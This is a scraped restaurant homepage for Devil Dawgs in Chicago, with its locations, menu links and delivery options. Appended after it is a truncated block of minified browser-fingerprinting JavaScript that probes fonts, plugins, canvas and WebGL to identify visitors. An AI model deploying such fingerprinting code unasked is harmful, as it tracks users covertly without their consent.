src='https://devildawgs.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://devildawgs.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='https://devildawgs.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://devildawgs.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://devildawgs.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.10" /> <link rel='shortlink' href='https://devildawgs.com/' /> <link rel="alternate" type="application/json+oembed" href="https://devildawgs.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fdevildawgs.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://devildawgs.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fdevildawgs.com%2F&#038;format=xml" /> </head> <body data-rsssl=1 class="home page-template page-template-page-home page-template-page-home-php page page-id-200"> <div class="wrapper"> <header> <ul> <li id="mobile-menu"><img src="https://devildawgs.com/wp-content/themes/devil-dawgs/img/mobile-menu.png" class="menu-nav"></li> <li id="logo"><a href="/"><img src="https://devildawgs.com/wp-content/themes/devil-dawgs/img/logo-main.jpg"></a></li> <li id="social-header"> <a href="https://www.facebook.com/DevilDawgsChicago" id="facebook"></a> <a href="https://twitter.com/DevilDawgs1" id="twitter"></a> <a href="http://www.yelp.com/biz/devil-dawgs-chicago" id="yelp"></a> <a href="https://instagram.com/on_sheffield/" id="instagram"></a> </li> <li id="addresses"> <div class="address"> <h4>Wicker Park</h4> <p>773-687-9441</p> <p>1431 N. Milwaukee</p> <p>Chicago, IL 60622</p> </div> <div class="address"> <h4>Sheffield</h4> <p>773-281-4300</p> <p>2147 N. Sheffield Ave.</p> <p>Chicago, IL 60614</p> </div> <div class="address"> <h4>South State</h4> <p>312-583-9100</p> <p>767 S. State St.</p> <p>Chicago, IL 60605</p> </div> </li> </ul> </header> <nav> <ul> <li class="page_item page-item-200 current_page_item"><a href="https://devildawgs.com/">Home</a></li> <li class="page_item page-item-491"><a href="https://devildawgs.com/menus/">Menus</a></li> <li class="page_item page-item-195"><a href="https://devildawgs.com/cater/">Cater</a></li> <li class="page_item page-item-196"><a href="https://devildawgs.com/where-to-find-us/">Where to find us</a></li> <li class="page_item page-item-197"><a href="https://devildawgs.com/hit-us-up/">Get in Touch</a></li> <li class="page_item page-item-199"><a href="https://devildawgs.com/tempting-wares/">Tempting Wares</a></li> </ul> </nav> <div role="main" class="main"> <article id="post-200" class="post-200 page type-page status-publish hentry" role="article"> <div class="container full"> <h1 id="headline">Dawg-Gone Good Food</h1> <div class="slider-wrapper"><div class="ribbon"></div><div id="nivoslider-336" class="nivoSlider"><a href="https://devildawgs.com/eats/"><img src="https://devildawgs.com/wp-content/uploads/2014/01/BurgersBEST_10_1.jpg" alt="" /></a><a href="https://devildawgs.com/eats/"><img src="https://devildawgs.com/wp-content/uploads/2014/01/DevilDawgsBEST_14_1.jpg" alt="" /></a><a href="https://devildawgs.com/eats/"><img src="https://devildawgs.com/wp-content/uploads/2014/01/Jose Caliente - Bacon Cheddar - Southern Slaw.jpg" alt="" /></a><a href="https://devildawgs.com/eats/"><img src="https://devildawgs.com/wp-content/uploads/2014/01/Chicago 1.jpg" alt="" /></a><a href="https://devildawgs.com/eats/"><img src="https://devildawgs.com/wp-content/uploads/2014/01/BurgersBEST_06_1.jpg" alt="" /></a><a href="https://devildawgs.com/eats/"><img src="https://devildawgs.com/wp-content/uploads/2014/01/BurgersBEST_05_1.jpg" alt="" /></a><a href="https://devildawgs.com/eats/"><img src="https://devildawgs.com/wp-content/uploads/2014/01/DevilDawgsBEST_01_1.jpg" alt="" /></a><a href="https://devildawgs.com/eats/"><img src="https://devildawgs.com/wp-content/uploads/2014/01/Coney Dawg_1.jpg" alt="" /></a></div></div><script type="text/javascript"> jQuery(window).load(function(){ jQuery("#nivoslider-336").nivoSlider({ effect:"fade", slices:15, boxCols:8, boxRows:4, animSpeed:500, pauseTime:5000, startSlide:0, directionNav:false, controlNav:false, controlNavThumbs:false, pauseOnHover:false, manualAdvance:false }); }); </script> <h3>This is <em>the</em> Devil Dawgs.</h3> <p>The place to get real Chicago dogs and really damn great food. We’ve crammed our stand with chef-inspired awesomeness like our signature Devil Dawgs, our Kick Ass Burger and fresh cut fries to match. Give in to the sin and come on by. And for you night owls, we’re open late for your late night cravings.</p> <h3> Give them a Devil of a good time for the holidays with Devil Dawg Gift Cards! <a href="https://swipeit.com/product/1221/devil-dawgs" onclick="__gaTracker('send', 'event', 'outbound-article', 'https://swipeit.com/product/1221/devil-dawgs', 'Click here');" rel="noopener" target="_blank">Click here</a> for yours. </h3> </div> <div class="container half"> <p><a href="eats"><img class="alignnone size-full wp-image-233" src="https://devildawgs.com/wp-content/uploads/2014/01/icon-dd-large.jpg" alt="icon-dd-large" width="500" height="500" /></a></p> <h4>Come Dine with the Devil</h4> <p><a href="eats">Check out our menu.</a></p> </div> <div class="container half"> <p><a href="where-to-find-us"><img class="alignnone size-full wp-image-232" src="https://devildawgs.com/wp-content/uploads/2014/01/icon-map-large.jpg" alt="icon-map-large" width="500" height="500" /></a></p> <h4>Aw, the Taste of Temptation.</h4> <p><a href="where-to-find-us">Find the Devil Dawgs nearest to you.</a></p> </div> </div> </div> </article><!-- #post-200 --> </div><!-- .main --> <footer> <div id="social-header"> <a href="https://www.facebook.com/DevilDawgsChicago" id="facebook" class="social"></a> <a href="https://twitter.com/DevilDawgs1" id="twitter" class="social"></a> <a href="http://www.yelp.com/biz/devil-dawgs-chicago" id="yelp" class="social"></a> <a href="https://instagram.com/on_sheffield/" id="instagram" class="social"></a> </div> <div id="stub"> <div class="alignleft"> <h5 class="new"><a href="http://tinyurl.com/onqlbbl" target="_blank">Click Here to Join the Fan Club.</h5> </div> <div class="alignright"> <!--<a href="http://eat24hrs.com/restaurants/29933" target="_blank"><img alt="View Menu &amp; Order" src="https://eat24.com/images/lrg_red_2.png" style="width:255px;margin-top:-5px;" /></a>--> <h5 class="new">Get your Dawg delivered.</h5> <h5 class="new">Order Online from the South Loop Location:</h5> <h5 class="new"><a href="https://www.delivery.com/#!/cities/chicago/categories/restaurant/devil-dawgs-on-state?cq=DJfIJHNzCrXoMulPFtzpNjT7kagf37kmSv5bVZgLZcEBuyYpiGa13w..&cq_key=abcf2" target="_blank">Delivery.Com •</a> <a href="https://www.grubhub.com/r/w/15717/chicago/devil-dawgs-on-state-st/" target="_blank">GrubHub •</a> <a href="http://eat24hrs.com/restaurants/29933" target="_blank">Eat24</a></h5> <h5 class="new">Order Online from the Wicker Park Location:</h5> <h5 class="new"><a href="http://www.grubhub.com/r/w/50719/restaurant/385987" target="_blank">GrubHub</a></h5></div> </div> </footer> </div><!-- .wrapper --> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script> <script>window.jQuery || document.write('<script src="https://devildawgs.com/wp-content/themes/devil-dawgs/js/libs/jquery-1.7.1.min.js"><\/script>')</script> <script src="https://devildawgs.com/wp-content/themes/devil-dawgs/js/plugins.js"></script> <script src="https://devildawgs.com/wp-content/themes/devil-dawgs/js/script.js"></script> <script> if (document.location.protocol != "https:") { document.location = document.URL.replace(/^http:/i, "https:"); } </script> <script type='text/javascript' src='https://devildawgs.com/wp-content/plugins/nivo-slider/scripts/nivo-slider/jquery.nivo.slider.pack.js?ver=4.9.10'></script> <link rel='stylesheet' id='nivoslider-theme-dark-css' href='https://devildawgs.com/wp-content/plugins/nivo-slider/scripts/nivo-slider/themes/dark/dark.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='nivoslider-theme-default-css' href='https://devildawgs.com/wp-content/plugins/nivo-slider/scripts/nivo-slider/themes/default/default.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='nivoslider-theme-light-css' href='https://devildawgs.com/wp-content/plugins/nivo-slider/scripts/nivo-slider/themes/light/light.css?ver=4.9.10' type='text/css' media='all' /> <script type='text/javascript' src='https://devildawgs.com/wp-includes/js/comment-reply.min.js?ver=4.9.10'></script> <script type='text/javascript' src='https://devildawgs.com/wp-content/plugins/js-banner-rotate//includes/jsbrotate.js?ver=2.0.2'></script> <script type='text/javascript' src='https://devildawgs.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> <!--*https://www.delivery.com/#!/cities/chicago/categories/restaurant/devil-dawgs-on-state?cq=DJfIJHNzCrXoMulPFtzpNjT7kagf37kmSv5bVZgLZcEBuyYpiGa13w..&cq_key=abcf2 <https://www.delivery.com/#!/cities/chicago/categories/restaurant/devil-dawgs-on-state?cq=DJfIJHNzCrXoMulPFtzpNjT7kagf37kmSv5bVZgLZcEBuyYpiGa13w..&cq_key=abcf2>*--> </body> </html>
1
(function(){function m(b){function c(b){b=a(b,[0,b[0]>>>1]);b=f(b,[4283543511,3981806797]);b=a(b,[0,b[0]>>>1]);b=f(b,[3301882366,444984403]);return b=a(b,[0,b[0]>>>1])}function a(a,b){return[a[0]^b[0],a[1]^b[1]]}function d(a,b){return(b%=64)?32>b?[a[0]<<b|a[1]>>>32-b,a[1]<<b]:[a[1]<<b-32,0]:a}function n(a,b){b%=64;if(32===b)return[a[1],a[0]];if(32>b)return[a[0]<<b|a[1]>>>32-b,a[1]<<b|a[0]>>>32-b];b-=32;return[a[1]<<b|a[0]>>>32-b,a[0]<<b|a[1]>>>32-b]}function f(a,b){a=[a[0]>>>16,a[0]&65535,a[1]>>>16,a[1]&65535]; b=[b[0]>>>16,b[0]&65535,b[1]>>>16,b[1]&65535];var c=[0,0,0,0];c[3]+=a[3]*b[3];c[2]+=c[3]>>>16;c[3]&=65535;c[2]+=a[2]*b[3];c[1]+=c[2]>>>16;c[2]&=65535;c[2]+=a[3]*b[2];c[1]+=c[2]>>>16;c[2]&=65535;c[1]+=a[1]*b[3];c[0]+=c[1]>>>16;c[1]&=65535;c[1]+=a[2]*b[2];c[0]+=c[1]>>>16;c[1]&=65535;c[1]+=a[3]*b[1];c[0]+=c[1]>>>16;c[1]&=65535;c[0]+=a[0]*b[3]+a[1]*b[2]+a[2]*b[1]+a[3]*b[0];c[0]&=65535;return[c[0]<<16|c[1],c[2]<<16|c[3]]}function p(a,b){a=[a[0]>>>16,a[0]&65535,a[1]>>>16,a[1]&65535];b=[b[0]>>>16,b[0]&65535, b[1]>>>16,b[1]&65535];var c=[0,0,0,0];c[3]+=a[3]+b[3];c[2]+=c[3]>>>16;c[3]&=65535;c[2]+=a[2]+b[2];c[1]+=c[2]>>>16;c[2]&=65535;c[1]+=a[1]+b[1];c[0]+=c[1]>>>16;c[1]&=65535;c[0]+=a[0]+b[0];c[0]&=65535;return[c[0]<<16|c[1],c[2]<<16|c[3]]}var r;b=b||"";r=31;for(var t=b.length%16,v=b.length-t,k=[0,r],h=[0,r],g=[0,0],l=[0,0],w=[2277735313,289559509],x=[1291169091,658871167],e=0;e<v;e+=16)g=[b.charCodeAt(e+4)&255|(b.charCodeAt(e+5)&255)<<8|(b.charCodeAt(e+6)&255)<<16|(b.charCodeAt(e+7)&255)<<24,b.charCodeAt(e)& 255|(b.charCodeAt(e+1)&255)<<8|(b.charCodeAt(e+2)&255)<<16|(b.charCodeAt(e+3)&255)<<24],l=[b.charCodeAt(e+12)&255|(b.charCodeAt(e+13)&255)<<8|(b.charCodeAt(e+14)&255)<<16|(b.charCodeAt(e+15)&255)<<24,b.charCodeAt(e+8)&255|(b.charCodeAt(e+9)&255)<<8|(b.charCodeAt(e+10)&255)<<16|(b.charCodeAt(e+11)&255)<<24],g=f(g,w),g=n(g,31),g=f(g,x),k=a(k,g),k=n(k,27),k=p(k,h),k=p(f(k,[0,5]),[0,1390208809]),l=f(l,x),l=n(l,33),l=f(l,w),h=a(h,l),h=n(h,31),h=p(h,k),h=p(f(h,[0,5]),[0,944331445]);g=[0,0];l=[0,0];for(r= [function(){g=a(g,[0,b.charCodeAt(e)]);g=f(g,w);g=n(g,31);g=f(g,x);k=a(k,g)},function(){g=a(g,d([0,b.charCodeAt(e+1)],8))},function(){g=a(g,d([0,b.charCodeAt(e+2)],16))},function(){g=a(g,d([0,b.charCodeAt(e+3)],24))},function(){g=a(g,d([0,b.charCodeAt(e+4)],32))},function(){g=a(g,d([0,b.charCodeAt(e+5)],40))},function(){g=a(g,d([0,b.charCodeAt(e+6)],48))},function(){g=a(g,d([0,b.charCodeAt(e+7)],56))},function(){l=a(l,[0,b.charCodeAt(e+8)]);l=f(l,x);l=n(l,33);l=f(l,w);h=a(h,l)},function(){l=a(l,d([0, b.charCodeAt(e+9)],8))},function(){l=a(l,d([0,b.charCodeAt(e+10)],16))},function(){l=a(l,d([0,b.charCodeAt(e+11)],24))},function(){l=a(l,d([0,b.charCodeAt(e+12)],32))},function(){l=a(l,d([0,b.charCodeAt(e+13)],40))},function(){l=a(l,d([0,b.charCodeAt(e+14)],48))}];0<t--;)r[t]();k=a(k,[0,b.length]);h=a(h,[0,b.length]);k=p(k,h);h=p(h,k);k=c(k);h=c(h);k=p(k,h);h=p(h,k);return("00000000"+(k[0]>>>0).toString(16)).slice(-8)+("00000000"+(k[1]>>>0).toString(16)).slice(-8)+("00000000"+(h[0]>>>0).toString(16)).slice(-8)+ ("00000000"+(h[1]>>>0).toString(16)).slice(-8)} function q(){this.detectScreenOrientation=!0;this.sortPluginsFor=[/palemoon/i];this.userDefinedFonts=[];this.dontUseFakeFontInCanvas=this.extendedJsFonts=!1;this.exclude={UserAgent:!1,Language:!1,ColorDepth:!1,PixelRatio:!1,ScreenResolution:!1,AvailableScreenResolution:!1,TimezoneOffset:!1,SessionStorage:!1,LocalStorage:!1,IndexedDB:!1,AddBehavior:!1,OpenDatabase:!1,CpuClass:!1,Platform:!1,DoNotTrack:!1,Plugins:!1,IEPlugins:!1,Canvas:!1,WebGL:!1,AdBlock:!1,HasLiedLanguages:!1,HasLiedResolution:!1, HasLiedOs:!1,HasLiedBrowser:!1,TouchSupport:!1,JsFonts:!1}}function u(b){this.a=b||new q;this.b=Array.prototype.forEach;this.c=Array.prototype.map} var y={A:function(b){function c(a){for(var b=!1,c=0;c<d.length&&!(b=a[c].offsetWidth!==t[d[c]]||a[c].offsetHeight!==v[d[c]]);c++);return b}function a(){var a=document.createElement("span");a.style.position="absolute";a.style.left="-9999px";a.style.fontSize="72px";a.style.lineHeight="normal";a.innerHTML="mmmmmmmmmmlli";return a}var d=["monospace","sans-serif","serif"],n="Andale Mono;Arial;Arial Black;Arial Hebrew;Arial MT;Arial Narrow;Arial Rounded MT Bold;Arial Unicode MS;Bitstream Vera Sans Mono;Book Antiqua;Bookman Old Style;Calibri;Cambria;Cambria Math;Century;Century Gothic;Century Schoolbook;Comic Sans;Comic Sans MS;Consolas;Courier;Courier New;Garamond;Geneva;Georgia;Helvetica;Helvetica Neue;Impact;Lucida Bright;Lucida Calligraphy;Lucida Console;Lucida Fax;LUCIDA GRANDE;Lucida Handwriting;Lucida Sans;Lucida Sans Typewriter;Lucida Sans Unicode;Microsoft Sans Serif;Monaco;Monotype Corsiva;MS Gothic;MS Outlook;MS PGothic;MS Reference Sans Serif;MS Sans Serif;MS Serif;MYRIAD;MYRIAD PRO;Palatino;Palatino Linotype;Segoe Print;Segoe Script;Segoe UI;Segoe UI Light;Segoe UI Semibold;Segoe UI Symbol;Tahoma;Times;Times New Roman;Times New Roman PS;Trebuchet MS;Verdana;Wingdings;Wingdings 2;Wingdings 3".split(";"), f="Abadi MT Condensed Light;Academy Engraved LET;ADOBE CASLON PRO;Adobe Garamond;ADOBE GARAMOND PRO;Agency FB;Aharoni;Albertus Extra Bold;Albertus Medium;Algerian;Amazone BT;American Typewriter;American Typewriter Condensed;AmerType Md BT;Andalus;Angsana New;AngsanaUPC;Antique Olive;Aparajita;Apple Chancery;Apple Color Emoji;Apple SD Gothic Neo;Arabic Typesetting;ARCHER;ARNO PRO;Arrus BT;Aurora Cn BT;AvantGarde Bk BT;AvantGarde Md BT;AVENIR;Ayuthaya;Bandy;Bangla Sangam MN;Bank Gothic;BankGothic Md BT;Baskerville;Baskerville Old Face;Batang;BatangChe;Bauer Bodoni;Bauhaus 93;Bazooka;Bell MT;Bembo;Benguiat Bk BT;Berlin Sans FB;Berlin Sans FB Demi;Bernard MT Condensed;BernhardFashion BT;BernhardMod BT;Big Caslon;BinnerD;Blackadder ITC;BlairMdITC TT;Bodoni 72;Bodoni 72 Oldstyle;Bodoni 72 Smallcaps;Bodoni MT;Bodoni MT Black;Bodoni MT Condensed;Bodoni MT Poster Compressed;Bookshelf Symbol 7;Boulder;Bradley Hand;Bradley Hand ITC;Bremen Bd BT;Britannic Bold;Broadway;Browallia New;BrowalliaUPC;Brush Script MT;Californian FB;Calisto MT;Calligrapher;Candara;CaslonOpnface BT;Castellar;Centaur;Cezanne;CG Omega;CG Times;Chalkboard;Chalkboard SE;Chalkduster;Charlesworth;Charter Bd BT;Charter BT;Chaucer;ChelthmITC Bk BT;Chiller;Clarendon;Clarendon Condensed;CloisterBlack BT;Cochin;Colonna MT;Constantia;Cooper Black;Copperplate;Copperplate Gothic;Copperplate Gothic Bold;Copperplate Gothic Light;CopperplGoth Bd BT;Corbel;Cordia New;CordiaUPC;Cornerstone;Coronet;Cuckoo;Curlz MT;DaunPenh;Dauphin;David;DB LCD Temp;DELICIOUS;Denmark;DFKai-SB;Didot;DilleniaUPC;DIN;DokChampa;Dotum;DotumChe;Ebrima;Edwardian Script ITC;Elephant;English 111 Vivace BT;Engravers MT;EngraversGothic BT;Eras Bold ITC;Eras Demi ITC;Eras Light ITC;Eras Medium ITC;EucrosiaUPC;Euphemia;Euphemia UCAS;EUROSTILE;Exotc350 Bd BT;FangSong;Felix Titling;Fixedsys;FONTIN;Footlight MT Light;Forte;FrankRuehl;Fransiscan;Freefrm721 Blk BT;FreesiaUPC;Freestyle Script;French Script MT;FrnkGothITC Bk BT;Fruitger;FRUTIGER;Futura;Futura Bk BT;Futura Lt BT;Futura Md BT;Futura ZBlk BT;FuturaBlack BT;Gabriola;Galliard BT;Gautami;Geeza Pro;Geometr231 BT;Geometr231 Hv BT;Geometr231 Lt BT;GeoSlab 703 Lt BT;GeoSlab 703 XBd BT;Gigi;Gill Sans;Gill Sans MT;Gill Sans MT Condensed;Gill Sans MT Ext Condensed Bold;Gill Sans Ultra Bold;Gill Sans Ultra Bold Condensed;Gisha;Gloucester MT Extra Condensed;GOTHAM;GOTHAM BOLD;Goudy Old Style;Goudy Stout;GoudyHandtooled BT;GoudyOLSt BT;Gujarati Sangam MN;Gulim;GulimChe;Gungsuh;GungsuhChe;Gurmukhi MN;Haettenschweiler;Harlow Solid Italic;Harrington;Heather;Heiti SC;Heiti TC;HELV;Herald;High Tower Text;Hiragino Kaku Gothic ProN;Hiragino Mincho ProN;Hoefler Text;Humanst 521 Cn BT;Humanst521 BT;Humanst521 Lt BT;Imprint MT Shadow;Incised901 Bd BT;Incised901 BT;Incised901 Lt BT;INCONSOLATA;Informal Roman;Informal011 BT;INTERSTATE;IrisUPC;Iskoola Pota;JasmineUPC;Jazz LET;Jenson;Jester;Jokerman;Juice ITC;Kabel Bk BT;Kabel Ult BT;Kailasa;KaiTi;Kalinga;Kannada Sangam MN;Kartika;Kaufmann Bd BT;Kaufmann BT;Khmer UI;KodchiangUPC;Kokila;Korinna BT;Kristen ITC;Krungthep;Kunstler Script;Lao UI;Latha;Leelawadee;Letter Gothic;Levenim MT;LilyUPC;Lithograph;Lithograph Light;Long Island;Lydian BT;Magneto;Maiandra GD;Malayalam Sangam MN;Malgun Gothic;Mangal;Marigold;Marion;Marker Felt;Market;Marlett;Matisse ITC;Matura MT Script Capitals;Meiryo;Meiryo UI;Microsoft Himalaya;Microsoft JhengHei;Microsoft New Tai Lue;Microsoft PhagsPa;Microsoft Tai Le;Microsoft Uighur;Microsoft YaHei;Microsoft Yi Baiti;MingLiU;MingLiU_HKSCS;MingLiU_HKSCS-ExtB;MingLiU-ExtB;Minion;Minion Pro;Miriam;Miriam Fixed;Mistral;Modern;Modern No. 20;Mona Lisa Solid ITC TT;Mongolian Baiti;MONO;MoolBoran;Mrs Eaves;MS LineDraw;MS Mincho;MS PMincho;MS Reference Specialty;MS UI Gothic;MT Extra;MUSEO;MV Boli;Nadeem;Narkisim;NEVIS;News Gothic;News GothicMT;NewsGoth BT;Niagara Engraved;Niagara Solid;Noteworthy;NSimSun;Nyala;OCR A Extended;Old Century;Old English Text MT;Onyx;Onyx BT;OPTIMA;Oriya Sangam MN;OSAKA;OzHandicraft BT;Palace Script MT;Papyrus;Parchment;Party LET;Pegasus;Perpetua;Perpetua Titling MT;PetitaBold;Pickwick;Plantagenet Cherokee;Playbill;PMingLiU;PMingLiU-ExtB;Poor Richard;Poster;PosterBodoni BT;PRINCETOWN LET;Pristina;PTBarnum BT;Pythagoras;Raavi;Rage Italic;Ravie;Ribbon131 Bd BT;Rockwell;Rockwell Condensed;Rockwell Extra Bold;Rod;Roman;Sakkal Majalla;Santa Fe LET;Savoye LET;Sceptre;Script;Script MT Bold;SCRIPTINA;Serifa;Serifa BT;Serifa Th BT;ShelleyVolante BT;Sherwood;Shonar Bangla;Showcard Gothic;Shruti;Signboard;SILKSCREEN;SimHei;Simplified Arabic;Simplified Arabic Fixed;SimSun;SimSun-ExtB;Sinhala Sangam MN;Sketch Rockwell;Skia;Small Fonts;Snap ITC;Snell Roundhand;Socket;Souvenir Lt BT;Staccato222 BT;Steamer;Stencil;Storybook;Styllo;Subway;Swis721 BlkEx BT;Swiss911 XCm BT;Sylfaen;Synchro LET;System;Tamil Sangam MN;Technical;Teletype;Telugu Sangam MN;Tempus Sans ITC;Terminal;Thonburi;Traditional Arabic;Trajan;TRAJAN PRO;Tristan;Tubular;Tunga;Tw Cen MT;Tw Cen MT Condensed;Tw Cen MT Condensed Extra Bold;TypoUpright BT;Unicorn;Univers;Univers CE 55 Medium;Univers Condensed;Utsaah;Vagabond;Vani;Vijaya;Viner Hand ITC;VisualUI;Vivaldi;Vladimir Script;Vrinda;Westminster;WHITNEY;Wide Latin;ZapfEllipt BT;ZapfHumnst BT;ZapfHumnst Dm BT;Zapfino;Zurich BlkEx BT;Zurich Ex BT;ZWAdobeF".split(";"); b.a.extendedJsFonts&&(n=n.concat(f));n=n.concat(b.a.userDefinedFonts);b=document.getElementsByTagName("body")[0];var p=document.createElement("div"),r=document.createElement("div"),t={},v={},f=function(){for(var b=[],c=0,f=d.length;c<f;c++){var e=a();e.style.fontFamily=d[c];p.appendChild(e);b.push(e)}return b}();b.appendChild(p);for(var k=0,h=d.length;k<h;k++)t[d[k]]=f[k].offsetWidth,v[d[k]]=f[k].offsetHeight;f=function(){for(var b={},c=0,f=n.length;c<f;c++){for(var e=[],g=0,k=d.length;g<k;g++){var h; h=n[c];var p=d[g],t=a();t.style.fontFamily="'"+h+"',"+p;h=t;r.appendChild(h);e.push(h)}b[n[c]]=e}return b}();b.appendChild(r);for(var k=[],h=0,g=n.length;h<g;h++)c(f[n[h]])&&k.push(n[h]);b.removeChild(r);b.removeChild(p);return k},f:function(b){for(var c=[],a=0,d=navigator.plugins.length;a<d;a++)c.push(navigator.plugins[a]);y.Z(b)&&(c=c.sort(function(a,b){return a.name>b.name?1:a.name<b.name?-1:0}));return b.map(c,function(a){var c=b.map(a,function(a){return[a.type,a.suffixes].join("~")}).join(","); return[a.name,a.description,c].join("::")})},F:function(b){var c=[];if(Object.getOwnPropertyDescriptor&&Object.getOwnPropertyDescriptor(window,"ActiveXObject")||"ActiveXObject"in window)c=b.map("AcroPDF.PDF;Adodb.Stream;AgControl.AgControl;DevalVRXCtrl.DevalVRXCtrl.1;MacromediaFlashPaper.MacromediaFlashPaper;Msxml2.DOMDocument;Msxml2.XMLHTTP;PDF.PdfCtrl;QuickTime.QuickTime;QuickTimeCheckObject.QuickTimeCheck.1;RealPlayer;RealPlayer.RealPlayer(tm) ActiveX Control (32-bit);RealVideo.RealVideo(tm) ActiveX Control (32-bit);Scripting.Dictionary;SWCtl.SWCtl;Shell.UIHelper;ShockwaveFlash.ShockwaveFlash;Skype.Detection;TDCCtl.TDCCtl;WMPlayer.OCX;rmocx.RealPlayer G2 Control;rmocx.RealPlayer G2 Control.1".split(";"), function(a){try{return new ActiveXObject(a),a}catch(b){return null}});navigator.plugins&&(c=c.concat(y.f(b)));return c},Z:function(b){var c=!1;b=b.a.sortPluginsFor;for(var a=0,d=b.length;a<d;a++)if(navigator.userAgent.match(b[a])){c=!0;break}return c},O:function(){try{return!!window.sessionStorage}catch(b){return!0}},N:function(){try{return!!window.localStorage}catch(b){return!0}},G:function(){var b=0,c=!1;"undefined"!==typeof navigator.maxTouchPoints?b=navigator.maxTouchPoints:"undefined"!==typeof navigator.msMaxTouchPoints&& (b=navigator.msMaxTouchPoints);try{document.createEvent("TouchEvent"),c=!0}catch(a){}return[b,c,"ontouchstart"in window]},w:function(b){var c=[],a=document.createElement("canvas");a.width=2E3;a.height=200;a.style.display="inline";var d=a.getContext("2d");d.rect(0,0,10,10);d.rect(2,2,6,6);c.push("canvas winding:"+(!1===d.isPointInPath(5,5,"evenodd")?"yes":"no"));d.textBaseline="alphabetic";d.fillStyle="#f60";d.fillRect(125,1,62,20);d.fillStyle="#069";d.font=b.a.dontUseFakeFontInCanvas?"11pt Arial": "11pt no-real-font-123";d.fillText("Cwm fjordbank glyphs vext quiz, \ud83d\ude03",2,15);d.fillStyle="rgba(102, 204, 0, 0.2)";d.font="18pt Arial";d.fillText("Cwm fjordbank glyphs vext quiz, \ud83d\ude03",4,45);d.globalCompositeOperation="multiply";d.fillStyle="rgb(255,0,255)";d.beginPath();d.arc(50,50,50,0,2*Math.PI,!0);d.closePath();d.fill();d.fillStyle="rgb(0,255,255)";d.beginPath();d.arc(100,50,50,0,2*Math.PI,!0);d.closePath();d.fill();d.fillStyle="rgb(255,255,0)";d.beginPath();d.arc(75,100,50, 0,2*Math.PI,!0);d.closePath();d.fill();d.fillStyle="rgb(255,0,255)";d.arc(75,75,75,0,2*Math.PI,!0);d.arc(75,75,25,0,2*Math.PI,!0);d.fill("evenodd");c.push("canvas fp:"+a.toDataURL());return c.join("~")},I:function(){function b(a){d.push(a)}function c(b){a.clearColor(0,0,0,1);a.enable(a.DEPTH_TEST);a.depthFunc(a.LEQUAL);a.clear(a.COLOR_BUFFER_BIT|a.DEPTH_BUFFER_BIT);return"["+b[0]+", "+b[1]+"]"}var a;a=y.H();if(!a)return"";var d=[],n=a.createBuffer();a.bindBuffer(a.ARRAY_BUFFER,n);var f=new Float32Array([-.2, -.9,0,.4,-.26,0,0,.732134444,0]);a.bufferData(a.ARRAY_BUFFER,f,a.STATIC_DRAW);n.a=3;n.b=3;var f=a.createProgram(),p=a.createShader(a.VERTEX_SHADER);a.shaderSource(p,"attribute vec2 attrVertex;varying vec2 varyinTexCoordinate;uniform vec2 uniformOffset;void main(){varyinTexCoordinate=attrVertex+uniformOffset;gl_Position=vec4(attrVertex,0,1);}");a.compileShader(p);var r=a.createShader(a.FRAGMENT_SHADER);a.shaderSource(r,"precision mediump float;varying vec2 varyinTexCoordinate;void main() {gl_FragColor=vec4(varyinTexCoordinate,0,1);}"); a.compileShader(r);a.attachShader(f,p);a.attachShader(f,r);a.linkProgram(f);a.useProgram(f);f.b=a.getAttribLocation(f,"attrVertex");f.a=a.getUniformLocation(f,"uniformOffset");a.enableVertexAttribArray(f.vertexPosArray);a.vertexAttribPointer(f.b,n.a,a.FLOAT,!1,0,0);a.uniform2f(f.a,1,1);a.drawArrays(a.TRIANGLE_STRIP,0,n.b);a.canvas&&d.push(a.canvas.toDataURL());b(a.getSupportedExtensions().join(";"));b(c(a.getParameter(a.ALIASED_LINE_WIDTH_RANGE)));b(c(a.getParameter(a.ALIASED_POINT_SIZE_RANGE))); b(a.getParameter(a.ALPHA_BITS));b(a.getContextAttributes().antialias?"yes":"no");b(a.getParameter(a.BLUE_BITS));b(a.getParameter(a.DEPTH_BITS));b(a.getParameter(a.GREEN_BITS));b(function(a){var b=a.getExtension("EXT_texture_filter_anisotropic")||a.getExtension("WEBKIT_EXT_texture_filter_anisotropic")||a.getExtension("MOZ_EXT_texture_filter_anisotropic");return b?(a=a.getParameter(b.MAX_TEXTURE_MAX_ANISOTROPY_EXT),0===a?2:a):null}(a));b(a.getParameter(a.MAX_COMBINED_TEXTURE_IMAGE_UNITS));b(a.getParameter(a.MAX_CUBE_MAP_TEXTURE_SIZE)); b(a.getParameter(a.MAX_FRAGMENT_UNIFORM_VECTORS));b(a.getParameter(a.MAX_RENDERBUFFER_SIZE));b(a.getParameter(a.MAX_TEXTURE_IMAGE_UNITS));b(a.getParameter(a.MAX_TEXTURE_SIZE));b(a.getParameter(a.MAX_VARYING_VECTORS));b(a.getParameter(a.MAX_VERTEX_ATTRIBS));b(a.getParameter(a.MAX_VERTEX_TEXTURE_IMAGE_UNITS));b(a.getParameter(a.MAX_VERTEX_UNIFORM_VECTORS));b(c(a.getParameter(a.MAX_VIEWPORT_DIMS)));b(a.getParameter(a.RED_BITS));b(a.getParameter(a.RENDERER));b(a.getParameter(a.SHADING_LANGUAGE_VERSION)); 